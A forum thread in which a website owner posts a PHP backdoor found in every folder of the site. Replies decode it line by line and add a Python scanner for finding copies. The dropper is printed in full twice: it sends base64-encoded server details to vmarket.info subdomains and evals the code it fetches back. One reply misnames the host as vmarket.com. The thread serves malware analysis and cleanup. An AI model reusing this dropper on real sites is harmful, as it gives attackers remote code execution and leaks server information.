I noticed that in every folder of my site there is a file with a varying name (116931.php, 12241.php, 28822.php) and all of them contain this code:

```php
<? error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);
$f=base64_decode("dm1hcmtldC5pbmZv");
if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="cd01c79da4a6f044165989be6a59818a") $f=$_REQUEST["id"];
if($c=file_get_contents(base64_decode("aHR0cDovLzdhZHMu").$f.$z))eval($c);
else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);
else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};
die(); ?>
```

I uploaded the file to VirusTotal and the result is Trojan.Script.473810 or PHP:Small-AH [Trj]. Does anyone know how to fix this and how to decode the file?
What type of website are you running? WordPress blogs are the most common software that I've seen hackers get into. If you are using WordPress and are on the latest version, I would check out what plugins you are using. They have also been known to open doors for exploits.
Well, here is what your file actually contains:

```php
<? error_reporting(0);                       // suppress any PHP errors so nothing shows up in logs or output
// collect details about the server and the incoming request
$a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e = (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i = (isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j = (isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
// pack all of it into a query string; each field is base64-encoded before it is sent out
$z = "/?" . base64_encode($a) . "." . base64_encode($b) . "." . base64_encode($c) . "." . base64_encode($d)
   . "." . base64_encode($e) . "." . base64_encode($f) . "." . base64_encode($g) . "." . base64_encode($h)
   . ".e." . base64_encode($i) . "." . base64_encode($j);
// the hidden host: base64_decode("dm1hcmtldC5pbmZv") is "vmarket.info"
$f = "vmarket.info";
// if the script is requested directly and ?q= hashes to the stored MD5, the host is replaced by whatever ?id= contains
if (basename($c) == basename($i) && isset($_REQUEST["q"]) && md5($_REQUEST["q"]) == "cd01c79da4a6f044165989be6a59818a") $f = $_REQUEST["id"];
// fetch PHP code from http://7ads.<host>, then http://7.<host>, then http://71.<host> via cURL, and execute whatever comes back
if ($c = file_get_contents("http://7ads." . $f . $z)) eval($c);
else if ($c = file_get_contents("http://7." . $f . $z)) eval($c);
else {
    $cu = curl_init("http://71." . $f . $z);
    curl_setopt($cu, CURLOPT_RETURNTRANSFER, 1);
    $o = curl_exec($cu);
    curl_close($cu);
    eval($o);
};
die(); ?>
```

As far as I have analysed the code, it is some kind of script that interacts with a file hosted on vmarket.com, loads some code from there and executes it locally. It also sends out all the server information and can receive data from the browser. It may be a simple script that loads something useful and required, or it may be a dangerous script that loads malicious code and executes it locally on your server; either way, I would never want to have a backdoor on my server.
After visiting the website vmarket.com I got to know about some spamming tactics; the guys over there are frauds. If they can't code a file without introducing a backdoor, then how do you think they can secure the backlink from your server? Also, who is responsible for the legitimacy of all the information sent out and received?
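To find every copy of a dropper like the one analysed above, a scan over the web root that scores each .php file on the traits this sample shows (errors silenced, base64 literals, eval of remotely fetched content, a `$_REQUEST` trigger, an all-digit file name) and decodes its base64 literals to reveal the hidden hostnames is more reliable than hunting by file name. This is an added example, not code from the thread; the `FIXTURE` string is a constructed, cut-down stand-in for the posted sample, and the thresholds and indicator names are my own choices.

```python
import base64
import re
import tempfile
from pathlib import Path
# Indicators drawn from the posted sample; none alone is proof, but several together are.
INDICATORS = {
    "silences_errors": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
    "decodes_b64": re.compile(r"base64_decode\s*\("),
    "evals": re.compile(r"\beval\s*\("),
    "fetches_remote": re.compile(r"\b(file_get_contents|curl_init)\s*\("),
    "request_trigger": re.compile(r"\$_REQUEST\s*\["),
}
B64_LITERAL = re.compile(r"base64_decode\(\s*[\"']([A-Za-z0-9+/=]+)[\"']\s*\)")
# Constructed, cut-down fixture with the sample's shape and two of its base64 literals (not the full dropper).
FIXTURE = ('<? error_reporting(0);$f=base64_decode("dm1hcmtldC5pbmZv");if(isset($_REQUEST["q"]))$f=$_REQUEST["id"];'
           'if($c=file_get_contents(base64_decode("aHR0cDovLzdhZHMu").$f))eval($c); ?>')


def decode_b64_literals(src: str) -> list[str]:
    """Plaintext of each base64_decode("...") literal that decodes to printable ASCII."""
    out = []
    for lit in B64_LITERAL.findall(src):
        try:
            txt = base64.b64decode(lit, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # binary or malformed payload: not a hostname/URL, skip it
        if txt.isprintable():
            out.append(txt)
    return out


def score_php(src: str) -> list[str]:
    """Names of the indicators present in one PHP source string."""
    return [name for name, rx in INDICATORS.items() if rx.search(src)]


def scan_webroot(root: str, min_hits: int = 3) -> list[dict]:
    """Report .php files under root with at least min_hits indicators or an all-digit name."""
    findings = []
    for path in sorted(Path(root).rglob("*.php")):
        src = path.read_text(errors="replace")
        hits = score_php(src)
        if len(hits) >= min_hits or path.stem.isdigit():
            findings.append({"name": path.name, "hits": hits, "decoded": decode_b64_literals(src)})
    return findings


def demo_scan() -> list[dict]:
    """Write the fixture plus a benign file into a temporary web root and scan it."""
    with tempfile.TemporaryDirectory() as root:
        (Path(root) / "116931.php").write_text(FIXTURE)
        (Path(root) / "index.php").write_text("<?php echo 'hello'; ?>")
        return scan_webroot(root)
```

Point `scan_webroot()` at the real document root and review each finding's `decoded` list; a legitimate file rarely hides hostnames in base64 next to `eval`.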